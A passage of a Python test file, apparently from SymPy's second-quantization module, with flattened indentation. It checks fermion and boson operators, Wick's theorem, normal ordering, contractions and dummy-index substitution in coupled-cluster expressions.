assert C(C(X, Z), Y) != 0
assert C(Y, C(X, Z)) != 0
i, j, k, l = symbols('i,j,k,l', below_fermi=True)
a, b, c, d = symbols('a,b,c,d', above_fermi=True)
p, q, r, s = symbols('p,q,r,s')
D = KroneckerDelta
assert C(Fd(a), F(i)) == -2*NO(F(i)*Fd(a))
assert C(Fd(j), NO(Fd(a)*F(i))).doit(wicks=True) == -D(j, i)*Fd(a)
assert C(Fd(a)*F(i), Fd(b)*F(j)).doit(wicks=True) == 0
def test_create_f():
i, j, n, m = symbols('i,j,n,m')
o = Fd(i)
assert isinstance(o, CreateFermion)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = Fd(1)
assert o.apply_operator(FKet([n])) == FKet([1, n])
assert o.apply_operator(FKet([n])) == -FKet([n, 1])
o = Fd(n)
assert o.apply_operator(FKet([])) == FKet([n])
vacuum = FKet([], fermi_level=4)
assert vacuum == FKet([], fermi_level=4)
i, j, k, l = symbols('i,j,k,l', below_fermi=True)
a, b, c, d = symbols('a,b,c,d', above_fermi=True)
p, q, r, s = symbols('p,q,r,s')
assert Fd(i).apply_operator(FKet([i, j, k], 4)) == FKet([j, k], 4)
assert Fd(a).apply_operator(FKet([i, b, k], 4)) == FKet([a, i, b, k], 4)
def test_annihilate_f():
i, j, n, m = symbols('i,j,n,m')
o = F(i)
assert isinstance(o, AnnihilateFermion)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = F(1)
assert o.apply_operator(FKet([1, n])) == FKet([n])
assert o.apply_operator(FKet([n, 1])) == -FKet([n])
o = F(n)
assert o.apply_operator(FKet([n])) == FKet([])
i, j, k, l = symbols('i,j,k,l', below_fermi=True)
a, b, c, d = symbols('a,b,c,d', above_fermi=True)
p, q, r, s = symbols('p,q,r,s')
assert F(i).apply_operator(FKet([i, j, k], 4)) == 0
assert F(a).apply_operator(FKet([i, b, k], 4)) == 0
assert F(l).apply_operator(FKet([i, j, k], 3)) == 0
assert F(l).apply_operator(FKet([i, j, k], 4)) == FKet([l, i, j, k], 4)
def test_create_b():
i, j, n, m = symbols('i,j,n,m')
o = Bd(i)
assert isinstance(o, CreateBoson)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = Bd(0)
assert o.apply_operator(BKet([n])) == sqrt(n + 1)*BKet([n + 1])
o = Bd(n)
assert o.apply_operator(BKet([n])) == o*BKet([n])
def test_annihilate_b():
i, j, n, m = symbols('i,j,n,m')
o = B(i)
assert isinstance(o, AnnihilateBoson)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = B(0)
def test_wicks():
p, q, r, s = symbols('p,q,r,s', above_fermi=True)
# Testing for particles only
str = F(p)*Fd(q)
assert wicks(str) == NO(F(p)*Fd(q)) + KroneckerDelta(p, q)
str = Fd(p)*F(q)
assert wicks(str) == NO(Fd(p)*F(q))
str = F(p)*Fd(q)*F(r)*Fd(s)
nstr = wicks(str)
fasit = NO(
KroneckerDelta(p, q)*KroneckerDelta(r, s)
+ KroneckerDelta(p, q)*AnnihilateFermion(r)*CreateFermion(s)
+ KroneckerDelta(r, s)*AnnihilateFermion(p)*CreateFermion(q)
- KroneckerDelta(p, s)*AnnihilateFermion(r)*CreateFermion(q)
- AnnihilateFermion(p)*AnnihilateFermion(r)*CreateFermion(q)*CreateFermion(s))
assert nstr == fasit
assert (p*q*nstr).expand() == wicks(p*q*str)
assert (nstr*p*q*2).expand() == wicks(str*p*q*2)
# Testing CC equations particles and holes
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
p, q, r, s = symbols('p q r s', cls=Dummy)
assert (wicks(F(a)*NO(F(i)*F(j))*Fd(b)) ==
NO(F(a)*F(i)*F(j)*Fd(b)) +
KroneckerDelta(a, b)*NO(F(i)*F(j)))
assert (wicks(F(a)*NO(F(i)*F(j)*F(k))*Fd(b)) ==
NO(F(a)*F(i)*F(j)*F(k)*Fd(b)) -
KroneckerDelta(a, b)*NO(F(i)*F(j)*F(k)))
expr = wicks(Fd(i)*NO(Fd(j)*F(k))*F(l))
assert (expr ==
-KroneckerDelta(i, k)*NO(Fd(j)*F(l)) -
KroneckerDelta(j, l)*NO(Fd(i)*F(k)) -
KroneckerDelta(i, k)*KroneckerDelta(j, l) +
KroneckerDelta(i, l)*NO(Fd(j)*F(k)) +
NO(Fd(i)*Fd(j)*F(k)*F(l)))
expr = wicks(F(a)*NO(F(b)*Fd(c))*Fd(d))
assert (expr ==
-KroneckerDelta(a, c)*NO(F(b)*Fd(d)) -
KroneckerDelta(b, d)*NO(F(a)*Fd(c)) -
KroneckerDelta(a, c)*KroneckerDelta(b, d) +
KroneckerDelta(a, d)*NO(F(b)*Fd(c)) +
NO(F(a)*F(b)*Fd(c)*Fd(d)))
def test_NO():
i, j, k, l = symbols('i j k l', below_fermi=True)
a, b, c, d = symbols('a b c d', above_fermi=True)
p, q, r, s = symbols('p q r s', cls=Dummy)
assert (NO(Fd(p)*F(q) + Fd(a)*F(b)) ==
NO(Fd(p)*F(q)) + NO(Fd(a)*F(b)))
assert (NO(Fd(i)*NO(F(j)*Fd(a))) ==
NO(Fd(i)*F(j)*Fd(a)))
assert NO(1) == 1
assert NO(i) == i
assert (NO(Fd(a)*Fd(b)*(F(c) + F(d))) ==
NO(Fd(a)*Fd(b)*F(c)) +
NO(Fd(a)*Fd(b)*F(d)))
assert NO(Fd(a)*F(b))._remove_brackets() == Fd(a)*F(b)
assert NO(F(j)*Fd(i))._remove_brackets() == F(j)*Fd(i)
assert (NO(Fd(p)*F(q)).subs(Fd(p), Fd(a) + Fd(i)) ==
NO(Fd(a)*F(q)) + NO(Fd(i)*F(q)))
assert (NO(Fd(p)*F(q)).subs(F(q), F(a) + F(i)) ==
NO(Fd(p)*F(a)) + NO(Fd(p)*F(i)))
expr = NO(Fd(p)*F(q))._remove_brackets()
assert wicks(expr) == NO(expr)
assert NO(Fd(a)*F(b)) == - NO(F(b)*Fd(a))
no = NO(Fd(a)*F(i)*F(b)*Fd(j))
l1 = [ ind for ind in no.iter_q_creators() ]
assert l1 == [0, 1]
l2 = [ ind for ind in no.iter_q_annihilators() ]
assert l2 == [3, 2]
def test_sorting():
i, j = symbols('i,j', below_fermi=True)
a, b = symbols('a,b', above_fermi=True)
p, q = symbols('p,q')
# p, q
assert _sort_anticommuting_fermions([Fd(p), F(q)]) == ([Fd(p), F(q)], 0)
assert _sort_anticommuting_fermions([F(p), Fd(q)]) == ([Fd(q), F(p)], 1)
# i, p
assert _sort_anticommuting_fermions([F(p), Fd(i)]) == ([F(p), Fd(i)], 0)
assert _sort_anticommuting_fermions([Fd(i), F(p)]) == ([F(p), Fd(i)], 1)
assert _sort_anticommuting_fermions([Fd(p), Fd(i)]) == ([Fd(p), Fd(i)], 0)
assert _sort_anticommuting_fermions([Fd(i), Fd(p)]) == ([Fd(p), Fd(i)], 1)
assert _sort_anticommuting_fermions([F(p), F(i)]) == ([F(i), F(p)], 1)
assert _sort_anticommuting_fermions([F(i), F(p)]) == ([F(i), F(p)], 0)
assert _sort_anticommuting_fermions([Fd(p), F(i)]) == ([F(i), Fd(p)], 1)
assert _sort_anticommuting_fermions([F(i), Fd(p)]) == ([F(i), Fd(p)], 0)
# a, p
assert _sort_anticommuting_fermions([F(p), Fd(a)]) == ([Fd(a), F(p)], 1)
assert _sort_anticommuting_fermions([Fd(a), F(p)]) == ([Fd(a), F(p)], 0)
assert _sort_anticommuting_fermions([Fd(p), Fd(a)]) == ([Fd(a), Fd(p)], 1)
assert _sort_anticommuting_fermions([Fd(a), Fd(p)]) == ([Fd(a), Fd(p)], 0)
assert _sort_anticommuting_fermions([F(p), F(a)]) == ([F(p), F(a)], 0)
assert _sort_anticommuting_fermions([F(a), F(p)]) == ([F(p), F(a)], 1)
assert _sort_anticommuting_fermions([Fd(p), F(a)]) == ([Fd(p), F(a)], 0)
assert _sort_anticommuting_fermions([F(a), Fd(p)]) == ([Fd(p), F(a)], 1)
# i, a
assert _sort_anticommuting_fermions([F(i), Fd(j)]) == ([F(i), Fd(j)], 0)
assert _sort_anticommuting_fermions([Fd(j), F(i)]) == ([F(i), Fd(j)], 1)
assert _sort_anticommuting_fermions([Fd(a), Fd(i)]) == ([Fd(a), Fd(i)], 0)
assert _sort_anticommuting_fermions([Fd(i), Fd(a)]) == ([Fd(a), Fd(i)], 1)
assert _sort_anticommuting_fermions([F(a), F(i)]) == ([F(i), F(a)], 1)
assert _sort_anticommuting_fermions([F(i), F(a)]) == ([F(i), F(a)], 0)
def test_contraction():
i, j, k, l = symbols('i,j,k,l', below_fermi=True)
a, b, c, d = symbols('a,b,c,d', above_fermi=True)
p, q, r, s = symbols('p,q,r,s')
assert contraction(Fd(i), F(j)) == KroneckerDelta(i, j)
assert contraction(F(a), Fd(b)) == KroneckerDelta(a, b)
assert contraction(F(a), Fd(i)) == 0
assert contraction(Fd(a), F(i)) == 0
assert contraction(F(i), Fd(a)) == 0
assert contraction(Fd(i), F(a)) == 0
assert contraction(Fd(i), F(p)) == KroneckerDelta(i, p)
restr = evaluate_deltas(contraction(Fd(p), F(q)))
assert restr.is_only_below_fermi
restr = evaluate_deltas(contraction(F(p), Fd(q)))
assert restr.is_only_above_fermi
def test_evaluate_deltas():
i, j, k = symbols('i,j,k')
r = KroneckerDelta(i, j) * KroneckerDelta(j, k)
assert evaluate_deltas(r) == KroneckerDelta(i, k)
r = KroneckerDelta(i, 0) * KroneckerDelta(j, k)
assert evaluate_deltas(r) == KroneckerDelta(i, 0) * KroneckerDelta(j, k)
r = KroneckerDelta(1, j) * KroneckerDelta(j, k)
assert evaluate_deltas(r) == KroneckerDelta(1, k)
r = KroneckerDelta(j, 2) * KroneckerDelta(k, j)
assert evaluate_deltas(r) == KroneckerDelta(2, k)
r = KroneckerDelta(i, 0) * KroneckerDelta(i, j) * KroneckerDelta(j, 1)
assert evaluate_deltas(r) == 0
r = (KroneckerDelta(0, i) * KroneckerDelta(0, j)
* KroneckerDelta(1, j) * KroneckerDelta(1, j))
assert evaluate_deltas(r) == 0
def test_Tensors():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
p, q, r, s = symbols('p q r s')
AT = AntiSymmetricTensor
assert AT('t', (a, b), (i, j)) == -AT('t', (b, a), (i, j))
assert AT('t', (a, b), (i, j)) == AT('t', (b, a), (j, i))
assert AT('t', (a, b), (i, j)) == -AT('t', (a, b), (j, i))
assert AT('t', (a, a), (i, j)) == 0
assert AT('t', (a, b), (i, i)) == 0
assert AT('t', (a, b, c), (i, j)) == -AT('t', (b, a, c), (i, j))
assert AT('t', (a, b, c), (i, j, k)) == AT('t', (b, a, c), (i, k, j))
tabij = AT('t', (a, b), (i, j))
assert tabij.has(a)
assert tabij.has(b)
assert tabij.has(i)
assert tabij.has(j)
assert tabij.subs(b, c) == AT('t', (a, c), (i, j))
assert (2*tabij).subs(i, c) == 2*AT('t', (a, b), (c, j))
assert AT('t', (a, a), (i, j)).subs(a, b) == AT('t', (b, b), (i, j))
assert AT('t', (a, i), (a, j)).subs(a, b) == AT('t', (b, i), (b, j))
def test_fully_contracted():
i, j, k, l = symbols('i j k l', below_fermi=True)
a, b, c, d = symbols('a b c d', above_fermi=True)
p, q, r, s = symbols('p q r s', cls=Dummy)
Fock = (AntiSymmetricTensor('f', (p,), (q,))*
NO(Fd(p)*F(q)))
V = (AntiSymmetricTensor('v', (p, q), (r, s))*
NO(Fd(p)*Fd(q)*F(s)*F(r)))/4
Fai = wicks(NO(Fd(i)*F(a))*Fock,
keep_only_fully_contracted=True,
simplify_kronecker_deltas=True)
assert Fai == AntiSymmetricTensor('f', (a,), (i,))
Vabij = wicks(NO(Fd(i)*Fd(j)*F(b)*F(a))*V,
keep_only_fully_contracted=True,
simplify_kronecker_deltas=True)
assert Vabij == AntiSymmetricTensor('v', (a, b), (i, j))
def test_substitute_dummies_without_dummies():
i, j = symbols('i,j')
assert substitute_dummies(att(i, j) + 2) == att(i, j) + 2
assert substitute_dummies(att(i, j) + 1) == att(i, j) + 1
def test_substitute_dummies_NO_operator():
i, j = symbols('i j', cls=Dummy)
assert substitute_dummies(att(i, j)*NO(Fd(i)*F(j))
- att(j, i)*NO(Fd(j)*F(i))) == 0
def test_substitute_dummies_SQ_operator():
i, j = symbols('i j', cls=Dummy)
assert substitute_dummies(att(i, j)*Fd(i)*F(j)
- att(j, i)*Fd(j)*F(i)) == 0
def test_substitute_dummies_new_indices():
i, j = symbols('i j', below_fermi=True, cls=Dummy)
a, b = symbols('a b', above_fermi=True, cls=Dummy)
p, q = symbols('p q', cls=Dummy)
f = Function('f')
assert substitute_dummies(f(i, a, p) - f(j, b, q), new_indices=True) == 0
def test_substitute_dummies_substitution_order():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
f = Function('f')
from sympy.utilities.iterables import variations
for permut in variations([i, j, k, l], 4):
assert substitute_dummies(f(*permut) - f(i, j, k, l)) == 0
def test_dummy_order_inner_outer_lines_VT1T1T1():
ii = symbols('i', below_fermi=True)
aa = symbols('a', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
# Coupled-Cluster T1 terms with V*T1*T1*T1
# t^{a}_{k} t^{c}_{i} t^{d}_{l} v^{lk}_{dc}
exprs = [
# permut v and t <=> swapping internal lines, equivalent
# irrespective of symmetries in v
v(k, l, c, d)*t(c, ii)*t(d, l)*t(aa, k),
v(l, k, c, d)*t(c, ii)*t(d, k)*t(aa, l),
v(k, l, d, c)*t(d, ii)*t(c, l)*t(aa, k),
v(l, k, d, c)*t(d, ii)*t(c, k)*t(aa, l),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_dummy_order_inner_outer_lines_VT1T1T1T1():
ii, jj = symbols('i j', below_fermi=True)
aa, bb = symbols('a b', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
# Coupled-Cluster T2 terms with V*T1*T1*T1*T1
exprs = [
# permut t <=> swapping external lines, not equivalent
# except if v has certain symmetries.
v(k, l, c, d)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(k, l, c, d)*t(c, jj)*t(d, ii)*t(aa, k)*t(bb, l),
v(k, l, c, d)*t(c, ii)*t(d, jj)*t(bb, k)*t(aa, l),
v(k, l, c, d)*t(c, jj)*t(d, ii)*t(bb, k)*t(aa, l),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [
# permut v <=> swapping external lines, not equivalent
# except if v has certain symmetries.
#
# Note that in contrast to above, these permutations have identical
# dummy order. That is because the proximity to external indices
# has higher influence on the canonical dummy ordering than the
# position of a dummy on the factors. In fact, the terms here are
# similar in structure as the result of the dummy substitions above.
v(k, l, c, d)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(l, k, c, d)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(k, l, d, c)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(l, k, d, c)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
]
for permut in exprs[1:]:
assert dums(exprs[0]) == dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [
# permut t and v <=> swapping internal lines, equivalent.
# Canonical dummy order is different, and a consistent
# substitution reveals the equivalence.
v(k, l, c, d)*t(c, ii)*t(d, jj)*t(aa, k)*t(bb, l),
v(k, l, d, c)*t(c, jj)*t(d, ii)*t(aa, k)*t(bb, l),
v(l, k, c, d)*t(c, ii)*t(d, jj)*t(bb, k)*t(aa, l),
v(l, k, d, c)*t(c, jj)*t(d, ii)*t(bb, k)*t(aa, l),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_equivalent_internal_lines_VT1T1():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
exprs = [ # permute v. Different dummy order. Not equivalent.
v(i, j, a, b)*t(a, i)*t(b, j),
v(j, i, a, b)*t(a, i)*t(b, j),
v(i, j, b, a)*t(a, i)*t(b, j),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v. Different dummy order. Equivalent
v(i, j, a, b)*t(a, i)*t(b, j),
v(j, i, b, a)*t(a, i)*t(b, j),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [ # permute t. Same dummy order, not equivalent.
v(i, j, a, b)*t(a, i)*t(b, j),
v(i, j, a, b)*t(b, i)*t(a, j),
]
for permut in exprs[1:]:
assert dums(exprs[0]) == dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v and t. Different dummy order, equivalent
v(i, j, a, b)*t(a, i)*t(b, j),
v(j, i, a, b)*t(a, j)*t(b, i),
v(i, j, b, a)*t(b, i)*t(a, j),
v(j, i, b, a)*t(b, j)*t(a, i),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_equivalent_internal_lines_VT2conjT2():
# this diagram requires special handling in TCE
i, j, k, l, m, n = symbols('i j k l m n', below_fermi=True, cls=Dummy)
a, b, c, d, e, f = symbols('a b c d e f', above_fermi=True, cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
from sympy.utilities.iterables import variations
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
# v(abcd)t(abij)t(ijcd)
template = v(p1, p2, p3, p4)*t(p1, p2, i, j)*t(i, j, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
template = v(p1, p2, p3, p4)*t(p1, p2, j, i)*t(j, i, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
# v(abcd)t(abij)t(jicd)
template = v(p1, p2, p3, p4)*t(p1, p2, i, j)*t(j, i, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
template = v(p1, p2, p3, p4)*t(p1, p2, j, i)*t(i, j, p3, p4)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
def test_equivalent_internal_lines_VT2conjT2_ambiguous_order():
# These diagrams invokes _determine_ambiguous() because the
# dummies can not be ordered unambiguously by the key alone
i, j, k, l, m, n = symbols('i j k l m n', below_fermi=True, cls=Dummy)
a, b, c, d, e, f = symbols('a b c d e f', above_fermi=True, cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
from sympy.utilities.iterables import variations
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
# v(abcd)t(abij)t(cdij)
template = v(p1, p2, p3, p4)*t(p1, p2, i, j)*t(p3, p4, i, j)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
template = v(p1, p2, p3, p4)*t(p1, p2, j, i)*t(p3, p4, i, j)
permutator = variations([a, b, c, d], 4)
base = template.subs(zip([p1, p2, p3, p4], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4], permut)
expr = template.subs(subslist)
assert dums(base) != dums(expr)
assert substitute_dummies(expr) == substitute_dummies(base)
def test_equivalent_internal_lines_VT2():
i, j, k, l = symbols('i j k l', below_fermi=True, cls=Dummy)
a, b, c, d = symbols('a b c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
exprs = [
# permute v. Same dummy order, not equivalent.
#
# This test show that the dummy order may not be sensitive to all
# index permutations. The following expressions have identical
# structure as the resulting terms from of the dummy subsitutions
# in the test above. Here, all expressions have the same dummy
# order, so they cannot be simplified by means of dummy
# substitution. In order to simplify further, it is necessary to
# exploit symmetries in the objects, for instance if t or v is
# antisymmetric.
v(i, j, a, b)*t(a, b, i, j),
v(j, i, a, b)*t(a, b, i, j),
v(i, j, b, a)*t(a, b, i, j),
v(j, i, b, a)*t(a, b, i, j),
]
for permut in exprs[1:]:
assert dums(exprs[0]) == dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [
# permute t.
v(i, j, a, b)*t(a, b, i, j),
v(i, j, a, b)*t(b, a, i, j),
v(i, j, a, b)*t(a, b, j, i),
v(i, j, a, b)*t(b, a, j, i),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) != substitute_dummies(permut)
exprs = [ # permute v and t. Relabelling of dummies should be equivalent.
v(i, j, a, b)*t(a, b, i, j),
v(j, i, a, b)*t(a, b, j, i),
v(i, j, b, a)*t(b, a, i, j),
v(j, i, b, a)*t(b, a, j, i),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_internal_external_VT2T2():
ii, jj = symbols('i j', below_fermi=True)
aa, bb = symbols('a b', above_fermi=True)
k, l = symbols('k l', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
exprs = [
v(k, l, c, d)*t(aa, c, ii, k)*t(bb, d, jj, l),
v(l, k, c, d)*t(aa, c, ii, l)*t(bb, d, jj, k),
v(k, l, d, c)*t(aa, d, ii, k)*t(bb, c, jj, l),
v(l, k, d, c)*t(aa, d, ii, l)*t(bb, c, jj, k),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [
v(k, l, c, d)*t(aa, c, ii, k)*t(d, bb, jj, l),
v(l, k, c, d)*t(aa, c, ii, l)*t(d, bb, jj, k),
v(k, l, d, c)*t(aa, d, ii, k)*t(c, bb, jj, l),
v(l, k, d, c)*t(aa, d, ii, l)*t(c, bb, jj, k),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
exprs = [
v(k, l, c, d)*t(c, aa, ii, k)*t(bb, d, jj, l),
v(l, k, c, d)*t(c, aa, ii, l)*t(bb, d, jj, k),
v(k, l, d, c)*t(d, aa, ii, k)*t(bb, c, jj, l),
v(l, k, d, c)*t(d, aa, ii, l)*t(bb, c, jj, k),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_internal_external_pqrs():
ii, jj = symbols('i j')
aa, bb = symbols('a b')
k, l = symbols('k l', cls=Dummy)
c, d = symbols('c d', cls=Dummy)
v = Function('v')
t = Function('t')
dums = _get_ordered_dummies
exprs = [
v(k, l, c, d)*t(aa, c, ii, k)*t(bb, d, jj, l),
v(l, k, c, d)*t(aa, c, ii, l)*t(bb, d, jj, k),
v(k, l, d, c)*t(aa, d, ii, k)*t(bb, c, jj, l),
v(l, k, d, c)*t(aa, d, ii, l)*t(bb, c, jj, k),
]
for permut in exprs[1:]:
assert dums(exprs[0]) != dums(permut)
assert substitute_dummies(exprs[0]) == substitute_dummies(permut)
def test_dummy_order_well_defined():
aa, bb = symbols('a b', above_fermi=True)
k, l, m = symbols('k l m', below_fermi=True, cls=Dummy)
c, d = symbols('c d', above_fermi=True, cls=Dummy)
p, q = symbols('p q', cls=Dummy)
A = Function('A')
B = Function('B')
C = Function('C')
dums = _get_ordered_dummies
# We go through all key components in the order of increasing priority,
# and consider only fully orderable expressions. Non-orderable expressions
# are tested elsewhere.
# pos in first factor determines sort order
assert dums(A(k, l)*B(l, k)) == [k, l]
assert dums(A(l, k)*B(l, k)) == [l, k]
assert dums(A(k, l)*B(k, l)) == [k, l]
assert dums(A(l, k)*B(k, l)) == [l, k]
# factors involving the index
assert dums(A(k, l)*B(l, m)*C(k, m)) == [l, k, m]
assert dums(A(k, l)*B(l, m)*C(m, k)) == [l, k, m]
assert dums(A(l, k)*B(l, m)*C(k, m)) == [l, k, m]
assert dums(A(l, k)*B(l, m)*C(m, k)) == [l, k, m]
assert dums(A(k, l)*B(m, l)*C(k, m)) == [l, k, m]
assert dums(A(k, l)*B(m, l)*C(m, k)) == [l, k, m]
assert dums(A(l, k)*B(m, l)*C(k, m)) == [l, k, m]
assert dums(A(l, k)*B(m, l)*C(m, k)) == [l, k, m]
# same, but with factor order determined by non-dummies
assert dums(A(k, aa, l)*A(l, bb, m)*A(bb, k, m)) == [l, k, m]
assert dums(A(k, aa, l)*A(l, bb, m)*A(bb, m, k)) == [l, k, m]
assert dums(A(k, aa, l)*A(m, bb, l)*A(bb, k, m)) == [l, k, m]
assert dums(A(k, aa, l)*A(m, bb, l)*A(bb, m, k)) == [l, k, m]
assert dums(A(l, aa, k)*A(l, bb, m)*A(bb, k, m)) == [l, k, m]
assert dums(A(l, aa, k)*A(l, bb, m)*A(bb, m, k)) == [l, k, m]
assert dums(A(l, aa, k)*A(m, bb, l)*A(bb, k, m)) == [l, k, m]
assert dums(A(l, aa, k)*A(m, bb, l)*A(bb, m, k)) == [l, k, m]
# index range
assert dums(A(p, c, k)*B(p, c, k)) == [k, c, p]
assert dums(A(p, k, c)*B(p, c, k)) == [k, c, p]
assert dums(A(c, k, p)*B(p, c, k)) == [k, c, p]
assert dums(A(c, p, k)*B(p, c, k)) == [k, c, p]
assert dums(A(k, c, p)*B(p, c, k)) == [k, c, p]
assert dums(A(k, p, c)*B(p, c, k)) == [k, c, p]
assert dums(B(p, c, k)*A(p, c, k)) == [k, c, p]
assert dums(B(p, k, c)*A(p, c, k)) == [k, c, p]
assert dums(B(c, k, p)*A(p, c, k)) == [k, c, p]
assert dums(B(c, p, k)*A(p, c, k)) == [k, c, p]
assert dums(B(k, c, p)*A(p, c, k)) == [k, c, p]
assert dums(B(k, p, c)*A(p, c, k)) == [k, c, p]
def test_dummy_order_ambiguous():
aa, bb = symbols('a b', above_fermi=True)
i, j, k, l, m = symbols('i j k l m', below_fermi=True, cls=Dummy)
a, b, c, d, e = symbols('a b c d e', above_fermi=True, cls=Dummy)
p, q = symbols('p q', cls=Dummy)
p1, p2, p3, p4 = symbols('p1 p2 p3 p4', above_fermi=True, cls=Dummy)
p5, p6, p7, p8 = symbols('p5 p6 p7 p8', above_fermi=True, cls=Dummy)
h1, h2, h3, h4 = symbols('h1 h2 h3 h4', below_fermi=True, cls=Dummy)
h5, h6, h7, h8 = symbols('h5 h6 h7 h8', below_fermi=True, cls=Dummy)
A = Function('A')
B = Function('B')
from sympy.utilities.iterables import variations
# A*A*A*A*B -- ordering of p5 and p4 is used to figure out the rest
template = A(p1, p2)*A(p4, p1)*A(p2, p3)*A(p3, p5)*B(p5, p4)
permutator = variations([a, b, c, d, e], 5)
base = template.subs(zip([p1, p2, p3, p4, p5], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4, p5], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
# A*A*A*A*A -- an arbitrary index is assigned and the rest are figured out
template = A(p1, p2)*A(p4, p1)*A(p2, p3)*A(p3, p5)*A(p5, p4)
permutator = variations([a, b, c, d, e], 5)
base = template.subs(zip([p1, p2, p3, p4, p5], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4, p5], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
# A*A*A -- ordering of p5 and p4 is used to figure out the rest
template = A(p1, p2, p4, p1)*A(p2, p3, p3, p5)*A(p5, p4)
permutator = variations([a, b, c, d, e], 5)
base = template.subs(zip([p1, p2, p3, p4, p5], next(permutator)))
for permut in permutator:
subslist = zip([p1, p2, p3, p4, p5], permut)
expr = template.subs(subslist)
assert substitute_dummies(expr) == substitute_dummies(base)
def atv(*args):
return AntiSymmetricTensor('v', args[:2], args[2:] )
def att(*args):
if len(args) == 4:
return AntiSymmetricTensor('t', args[:2], args[2:] )
elif len(args) == 2:
return AntiSymmetricTensor('t', (args[0],), (args[1],))
